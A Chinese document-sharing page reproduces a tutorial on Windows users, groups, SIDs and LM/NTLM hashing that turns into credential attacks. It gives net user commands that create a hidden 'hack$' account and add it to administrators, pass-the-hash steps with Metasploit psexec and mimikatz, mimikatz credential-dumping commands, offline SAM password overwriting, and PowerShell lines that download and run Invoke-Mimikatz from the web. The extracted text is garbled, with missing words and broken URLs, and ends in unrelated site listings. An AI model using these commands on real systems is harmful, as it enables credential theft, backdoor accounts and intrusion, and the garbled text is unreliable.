版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领
文档简介
1、技术干货 | Windows中的用户和组以及用户破解 作者:谢公子 原文链接:/s/0ndIlNn73HSD4sV8vOjUiA本文由 干货 收集整理:/test/index.php用户帐户用户帐户是对计算机用户身份的标识,本地用户帐户、存在本地计算机上,只对本机有效,存储在本地安全帐户数据库 SAM 中,文件路径: C:WindowsSystem32configSAM ,对应的进程: lsass.exe 。通过本地用户和组,可以为用户和组分配权利和权限,从而限制用户和组执行某些操作的能力。 不同的用户身份拥有不
2、同的权限 每个用户包含一个名称和一个 用户帐户拥有唯一的安全标识符(Security Identifier,SID)7当我们去进程管理里面杀死 lsass.exe 进程时,windows会提示遇到错误,然后关机。 查看用户的SIDwhoami /user 查看系统当前用户的SIDwmic useraccount get name,sid 查看所有用户的SIDWindows 默认账户用于特殊用途,一般不需更修改其权限 与使用者关联的用户帐户 Administrator(管理员用户) 默认的管理员用户 Guest(来宾用户) 默认是禁用的 Windows 内置用户账户权限: System Admi
3、nistrator User Guest与windows组件关联的用户账户 System (本地系统):为windows的核心组件访问文件等资源提供权限Local Service (本地服务):预设的拥有最小权限的本地账户Network Service (网络服务):具有运行网络服务权限的计算机账户 查看、创建和删除账户使用命令查看、创建和删除账户 net user查看系统账户 net user xie 123 /add创建新用户xie, 设置为 123 net user hack$ 123 /add创建隐藏用户hack, 为123 net user xie查看账户xie的属性 net use
4、r xie x456. 将用户写的修改为x456. net user xie /del 删除用户xienet localgroup administratorsxie /add 将普通用户xie提权到管理员 net localgroup administrators hack$ /add 将隐藏用户hack提权到管理员 组账户组是一些用户的集合 组内的用户自动具备为组所设置的权限 内置组账户需要人为添加成员的内置组AdministratorsGuests Power UsersUsers(标准用户) Remote Desktop Usersadministators 组内的用户,都具备系统管理
5、员的权限,它们拥有对这台计算机最大的控制权限,可以执行整台计算机的管理任务。内置的系统管理员账号 Administrator 就是本地组的成员,而且无法将它从该组删除。如果这台计算机已加入域,则域的Domain Admins 会自动地加入到该计算机的Administrators组内。也就是说,域上的系统管理员在这台计算机上也具备着系统管理员的权限。 Guests 组是提供给没有用户帐户但是需要访问本地计算机内资源的用户使用,该组的成员无法永久地改变其桌面的工作环境。该组最常见的默认成员为用户帐号Guest。 Power Users 组内的用户具备比Users组更多的权利,但是比Administ
6、rators组拥有的权利更少一些,例如,可以:创建、删除、更改本地用户帐户;创建、删除、管理本地计算机内的共享文件夹与共享打印机;自定义系统设置,例如更改计算机时间、关闭计算机等。但是不可以更改Administrators,无法夺取文件的所有权、无法备份与还原文件、无法安装删除与删除设备驱动程序、无法管理安全与审核日志。 Users组内的成员只拥有一些基本的权利,例如运行应用程序,但是他们不能修改操作系统的设置、不能更改其它用户的数据、不能关闭服务器级的计算机。所有添加的本地用户帐户者自动属于Users组。如果这台计算机已经加入域,则域的Domain Users会自动地被加入到该计算机的Use
7、rs组中。 Remote Desktop Users 组内的成员拥有远程桌面登录的权限。默认Administrators组内的成员都拥有远程桌面的权限。 动态包含成员的内置组其成员由Windows程序“自动添加” ,Windows会根据用户的状态来决定用户所属的组 ,组内的成员也随之动态变化,无法修改 Interactive:动态包含在本地登录的用户 Authenticated Users:任何一个利用有效的用户帐户连接的用户都属于这个组。建议在设置权限时,尽量针对Authenticated Users组进行设置,而不要针对Everone进行设置。 Everyone :任何一个用户都属于这个组
8、。注意,如果Guest帐号被启用时,则给Everone这个组指派权限时必须小心,因为当一个没有帐户的用户连接计算机时,他被允许自动利用Guest帐户连接,但是因为Guest也是属于Everone组,所以他将具备Everyone所拥有的权限。 组的查看、创建和删除使用命令查看、创建和删除组 net localgroup 查看系统的组 net localgroup marketGroup /add新建一个marketGroup的组 net localgroup marketGroup xie /add 将用户xie加入marketGroup组中 net localgroup markGroup 查
9、看markGroup组内的成员 net localgroup marketGroup xie /del 将用户xi从marketGroup组中移除 net localgroup marketGroup /del删除marketGroup组 7net localgroup remote desktop users hack /add 将用户hack加入远程桌面组 net localgroup remote desktop users hack/del将用户hack从远程桌面组删除 Windows中对用户 的处理Windows系统使用两种方法对用户的 进行哈希处理,它们分别是 LAN Manage
10、r(LM)哈希和 NT LAN Manager(NTLM)哈希。所谓哈希(hash),就是使用一种加密函数对其进行加密。这个加密函数对一个任意长度的字符串数据进行一次数学加密函数运算,然后返回一个固定长度的字符串。现在已经有了更新的 NTLMv2 以及 Kerberos 验证体系。Windows加密过的口令,我们称之为hash,Windows的系统 hash默认情况下一般由两部 26分组成:第一部分是 LM-hash,第二部分是 NTLM-hash。在windows200以后的系统中,第一部分的 LM-hash 都是空值,因为LM-hash可以很容易的破解,所以windows2000之后这个值
11、默认为空,所以第二部分的NTLM-hash才真正是用户 的哈希值。 通常可从Windows系统中的SAM文件 和 域控的 NTDS.dit 文件中获得所有用户的hash,通过Mimikatz读取lsass.exe进程能获得已登录用户的NTLM hash这个网站提供对 转换成 LM-Hash 和 NTLM-Hash 的操作: /encryption/lmhashLM-hashLANManager(LM) 哈希是Windows系统所用的第一种哈希算法。它只有唯一一个版本且一直用到了NTLANManager(NTLM)哈希的出现,NTLM哈希用于Win
12、dows 2000及其之后系统中。新版操作系统因兼容缘故仍然支持LM哈希算法。但是在 Windows Vista 和 Windows 7 开始,LM-hash是默认关闭的。 LM加密过程1. 口令大写 2. 转换为HEX3. 用0补齐14字节(112bit) 4. 两组分组 5. 每组7字节HEX转为二进制,每7bit一组末尾加0,再转换成十六进制组成得到2组8字节的编码 6. 两组8字节编码,分别作为DES加密key为字符串“KGS!#$% ”进行加密 7. 两组DES加密后的编码拼接 注:自Windows2000以后的 windows 系统都是用 NTLM-hash 处理用户的 NTLM-
13、hashNew Technology LAN Manager(NTLM)哈希算法是微软认可的另一种算法。Windows2000以后的 windows 系统都是用 NTLM-hash 处理用户的 LM-hash1. 换成HEX2. HEX字符串进行ASCII转Unicode3. Unicode字符串进行标准MD4单向哈希加密 在线NTLM加密的网站: https:/www.jisuan.mobi/p11BbzHum6b3uyJW.html如图,第三部分是LM-Hash,第四部分是NTLM-Hash。目前的LM-hash是空值,所以第四部分的NTLM-hash才是用户 的哈希值。 哈希传递攻击(P
14、ass-the-Hash,PtH)MSF进行哈希传递攻击PtH有些时候,当我们获取到了某台主机的Administrator用户的LM-Hash和 NTLM-Hash ,并且该主机的445端口打开着。我们则可以利用 exploit/windows/smb/psexec 漏洞用MSF进行远程登录(哈希传递攻击)。(只能是administrator用户的LM-hash和NTLM-hash),这个利用跟工作组环境或者域环境无关。 mimikatz进行哈希传递攻击PtH(工作组)当我们获得了一台主机的NTLM哈希值,我们可以使用mimikatz对其进行哈希传递攻击。执行完命令后,会弹出cmd窗口。 在弹
15、出的cmd窗口,我们直接可以连接该主机,并且查看该主机下的文件夹。 或者可以直接将该主机的C盘映射到本地的K盘。 非 administrator 用户权限不够! 注: 只能在 mimikatz 弹出的cmd窗口才可以执行这些操作! mimikatz进行哈希传递攻击PtH(域)在域环境中,当我们获得了域内用户的NTLM哈希值,我们可以使用域内的一台主机用mimikatz对域控进行哈希传递攻击。执行完命令后,会弹出cmd窗口。前提是我们必须拥有域内任意一台主机的本地 administrator 权限和获得了域用户的NTLM哈希值 域:域控:WIN2008.基于SAM文件
16、的 破解SAM文件即账号 数据库文件。当我们登录系统的时候,系统会自动地和 C:WindowsSystem32configSAM 中的SAM文件自动校对,如发现此次与SAM文件中的加密数据符合时,你就会顺利登录;如果错误则无法登录。在系统运行期间,SAM文件一直是被占用的,是无法打开和编辑复制的,我们可以进入PE系统进行复制然后在利用软件进行 的修改 U盘启动,运行DiskGenius分区工具 找到 SAM 文件,复制到U盘 在另一台电脑上下载软件 NTPWedit 并运行,打开 SAM 文件,解锁并修改 把 SAM 文件复制到原来的电脑上,覆盖原文件注意:这样只能修改 ,并不能知道 的明文
17、使用 mimikatz 破解windows登录mimikatz 是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点就是他可以直接从 lsass.exe 进程中获取当前登录系统用户名的, lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入之后,便会储存在 lsass内存中,经过其 wdigest 和 tspkg 两个模块调用后,对其使用可逆的算法进行加密并存储在内存之中, 而 mimikatz 正是通过对lsass逆算获取到明文 !也就是说只要你不重启电脑,就可以通过他获取到登陆 ,只限当前登陆系统! 注
18、: 但是在安装了KB2871997补丁或者系统版本大于windows server 2012时,系统的内存中就不再保存明文的,这样利用mimikatz就不能从内存中读出明文 了。mimikatz的使用需要administrator用户执行,administrators中的其他用户都不行。 下载mimikatz程序,找到自己系统对应的位数,右键以管理员身份运行提升至debug权限在提示符下,输入: privilege:debug抓取: sekurlsa:logonpasswords使用mimikatz读取域控上所有域用户的Hash值 注:得在域控上以域管理员身份执行mimikatz提升至debu
19、g权限在提示符下,输入: privilege:debug 抓取 : lsadump:lsa /patch使用PowerShell命令读取读取明文(需要管理员权限)powershell IEX (New-Object Net.WebClient).DownloadString(/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1); Invoke-Mimikatz DumpCerts读取hash值(需要管理员权限)powershell IEX (New-Object Net.WebClient).DownloadString(https:/raw.githubuserc
温馨提示
- 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
- 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
- 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
- 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
- 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
- 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
- 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
最新文档
- 六年级语文第一学期教学计划7篇
- 六年级下册第12课《计算机控制的扩音系统》教案 浙教版2023年信息科技
- 内部培训食品安全法知识培训考试大全
- 全国自考(中国古代文学史一)模拟试卷9
- 借款抵押合同5篇
- 初中中考英语复习专项《动词和动词短语》
- 电气控制与PLC应用-教学大纲
- 2026 学龄前自闭症入门语言课件
- 高校校园文化建设调查与分析
- 电子商务平台运营流程解析
- 泰山教育联盟2026届高三年级4月考试模拟 政治试题(含答案)
- 2026年成都市新都区街道办人员招聘笔试模拟试题及答案解析
- 2026届广东省惠州市高三下学期模拟考试历史试题(含答案)
- 2026年贪污贿赂司法解释(二)学习与解读课件
- 2026年上半年广东广州开发区黄埔区招聘事业单位18人备考题库含答案详解(典型题)
- 山西临汾市第一中学校2025-2026学年高一下学期第一次月考语文试题(含答案)(含解析)
- 春季呼吸道疾病护理课件
- 仓库人员安全责任制度
- 2022年江苏省苏豪控股集团有限公司招聘笔试题库及答案解析
- 支架预压观测记录表
- 市政工程监理资料管理标准(试行)
评论
0/150
提交评论